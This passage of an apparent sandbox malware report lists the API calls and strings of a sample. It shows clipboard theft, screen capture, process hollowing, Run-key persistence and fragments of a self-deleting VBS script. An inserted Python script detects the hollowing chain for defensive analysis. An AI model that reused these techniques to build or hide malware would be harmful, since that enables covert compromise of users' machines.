                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$Context$AcquireRandomRelease
                        • String ID:
                        • API String ID: 1815803762-0
                        • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                        • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                        • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                        • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                        APIs
                        • OpenClipboard.USER32(00000000), ref: 0040B711
                        • GetClipboardData.USER32(0000000D), ref: 0040B71D
                        • CloseClipboard.USER32 ref: 0040B725
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$CloseDataOpen
                        • String ID:
                        • API String ID: 2058664381-0
                        • Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                        • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                        • Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                        • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FeaturePresentProcessor
                        • String ID:
                        • API String ID: 2325560087-3916222277
                        • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                        • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                        • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                        • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .
                        • API String ID: 0-248832578
                        • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                        • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                        • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                        • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID: lJD
                        • API String ID: 1084509184-3316369744
                        • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                        • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                        • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                        • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID: lJD
                        • API String ID: 1084509184-3316369744
                        • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                        • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                        • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                        • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                        APIs
                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID: GetLocaleInfoEx
                        • API String ID: 2299586839-2904428671
                        • Opcode ID: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                        • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                        • Opcode Fuzzy Hash: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                        • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                        • HeapFree.KERNEL32(00000000), ref: 004120EE
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$FreeProcess
                        • String ID:
                        • API String ID: 3859560861-0
                        • Opcode ID: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                        • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                        • Opcode Fuzzy Hash: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                        • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free$InfoLocale_abort
                        • String ID:
                        • API String ID: 1663032902-0
                        • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                        • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                        • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                        • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$InfoLocale_abort_free
                        • String ID:
                        • API String ID: 2692324296-0
                        • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                        • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                        • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                        • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                        APIs
                        • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: NameUser
                        • String ID:
                        • API String ID: 2645101109-0
                        • Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                        • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                        • Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                        • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                        APIs
                          • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                        • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalEnterEnumLocalesSectionSystem
                        • String ID:
                        • API String ID: 1272433827-0
                        • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                        • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                        • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                        • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                        • String ID:
                        • API String ID: 1084509184-0
                        • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                        • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                        • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                        • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                        APIs
                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.0.0 Pro), ref: 0040F8E5
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID:
                        • API String ID: 2299586839-0
                        • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                        • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                        • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                        • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                        • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                        • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                        • Instruction Fuzzy Hash:
                        APIs
                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                        • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                          • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                        • DeleteDC.GDI32(00000000), ref: 00418F2A
                        • DeleteDC.GDI32(00000000), ref: 00418F2D
                        • DeleteObject.GDI32(00000000), ref: 00418F30
                        • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                        • DeleteDC.GDI32(00000000), ref: 00418F62
                        • DeleteDC.GDI32(00000000), ref: 00418F65
                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                        • GetIconInfo.USER32(?,?), ref: 00418FBD
                        • DeleteObject.GDI32(?), ref: 00418FEC
                        • DeleteObject.GDI32(?), ref: 00418FF9
                        • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                        • DeleteDC.GDI32(?), ref: 0041917C
                        • DeleteDC.GDI32(00000000), ref: 0041917F
                        • DeleteObject.GDI32(00000000), ref: 00419182
                        • GlobalFree.KERNEL32(?), ref: 0041918D
                        • DeleteObject.GDI32(00000000), ref: 00419241
                        • GlobalFree.KERNEL32(?), ref: 00419248
                        • DeleteDC.GDI32(?), ref: 00419258
                        • DeleteDC.GDI32(00000000), ref: 00419263
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                        • String ID: DISPLAY
                        • API String ID: 479521175-865373369
                        • Opcode ID: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                        • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                        • Opcode Fuzzy Hash: eeea48b2f12328c67a7764adb0283258d44bef4919e0b7e4c041a6272c1fd371
                        • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                        APIs
                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                        • GetProcAddress.KERNEL32(00000000), ref: 00418139
                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                        • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                        • GetProcAddress.KERNEL32(00000000), ref: 00418161
                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                        • GetProcAddress.KERNEL32(00000000), ref: 00418175
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                        • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                        • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                        • ResumeThread.KERNEL32(?), ref: 00418435
                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                        • GetCurrentProcess.KERNEL32(?), ref: 00418457
                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                        • GetLastError.KERNEL32 ref: 0041847A
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                        • API String ID: 4188446516-108836778
                        • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                        • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                        • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                        • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
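The listing above is the process-hollowing primitive behind the "Injects a PE file into a foreign processes" signature: ZwCreateSection, ZwMapViewOfSection, ZwUnmapViewOfSection and ZwClose are resolved from ntdll by name, CreateProcessW is called with dwCreationFlags 00000004 (CREATE_SUSPENDED), the suspended thread's context is read, the target's memory is rewritten with WriteProcessMemory, the context is replaced and the thread resumed. The Python below is an added example, not code from the report or from the sample: it parses lines in the report's own API format and flags that ordered chain. Its sample input is the listing above, abridged. Two assumptions are built in: listing order (ascending address) approximates execution order within one function, and the IDA plugin prints stack slots beyond an API's real parameter count, which is why each GetProcAddress name appears on the preceding one-parameter GetModuleHandleA line.

```python
import re
from typing import Dict, List, Optional, Tuple

# One line of the report's "APIs" listing, with or without an argument list:
#   • CreateProcessW.KERNEL32(00000000,?,...,00000004,...), ref: 00418217
#   • GetLastError.KERNEL32 ref: 0041847A
API_LINE = re.compile(
    r"^\s*•?\s*(?P<sub>Part of subcall function [0-9A-Fa-f]{8}:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags, the 6th CreateProcessW argument

# The hollowing chain, in the order the calls must appear.
HOLLOWING_CHAIN = ["CreateProcessW", "GetThreadContext",
                   "WriteProcessMemory", "SetThreadContext", "ResumeThread"]


def parse_api_lines(text: str) -> List[Dict]:
    """Parse API lines into dicts; section labels ('APIs', 'Strings') are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in raw.split(",")] if raw else [],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub") is not None,
        })
    return calls


def arg_as_int(args: List[str], index: int) -> Optional[int]:
    """Argument `index` as an int when the plugin resolved it to hex; None for
    '?' (unresolved) or a string literal such as ntdll."""
    if index >= len(args):
        return None
    try:
        return int(args[index], 16)
    except ValueError:
        return None


def detect_hollowing(calls: List[Dict]) -> Dict:
    """Match HOLLOWING_CHAIN as an ordered subsequence of the function's own
    calls (subcall lines excluded). CreateProcessW only counts when its
    creation flags include CREATE_SUSPENDED."""
    direct = [c for c in calls if not c["subcall"]]
    steps: List[Tuple[str, int]] = []
    pos = 0
    for want in HOLLOWING_CHAIN:
        for i in range(pos, len(direct)):
            call = direct[i]
            if call["api"] != want:
                continue
            if want == "CreateProcessW":
                flags = arg_as_int(call["args"], 5)
                if flags is None or not flags & CREATE_SUSPENDED:
                    continue
            steps.append((call["api"], call["ref"]))
            pos = i + 1
            break
        else:
            break  # a step is missing; stop and report the partial chain
    # ZwUnmapViewOfSection resolved by name. The plugin prints stack slots past
    # GetModuleHandleA's single parameter, so the name lands on that line.
    unmap = any("ZwUnmapViewOfSection" in c["args"] for c in direct
                if c["api"] in ("GetModuleHandleA", "GetProcAddress"))
    return {"hollowing": len(steps) == len(HOLLOWING_CHAIN),
            "steps": steps, "unmap_resolved": unmap}


# Sample input copied (abridged) from the report's listing for function 00418136.
REPORT_LISTING = """\
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
• GetProcAddress.KERNEL32(00000000), ref: 00418139
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
• GetProcAddress.KERNEL32(00000000), ref: 0041814D
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
• GetProcAddress.KERNEL32(00000000), ref: 00418161
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
• GetProcAddress.KERNEL32(00000000), ref: 00418175
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
• GetThreadContext.KERNEL32(?,00000000), ref: 00418245
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
• TerminateProcess.KERNEL32(?,00000000), ref: 00418301
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
• SetThreadContext.KERNEL32(?,00000000), ref: 00418428
• ResumeThread.KERNEL32(?), ref: 00418435
• GetLastError.KERNEL32 ref: 0041847A
"""

if __name__ == "__main__":
    print(detect_hollowing(parse_api_lines(REPORT_LISTING)))
```

The ordered-subsequence match matters: CreateProcessW with CREATE_SUSPENDED on its own is what a debugger or installer does too, and WriteProcessMemory alone is common in legitimate tooling; it is the suspended create followed by a context rewrite and ResumeThread in one function that identifies the technique. The same parser can be pointed at any other function listing on this page.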
                        APIs
                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                        • ExitProcess.KERNEL32 ref: 0040D7D0
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                        • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                        • API String ID: 1861856835-332907002
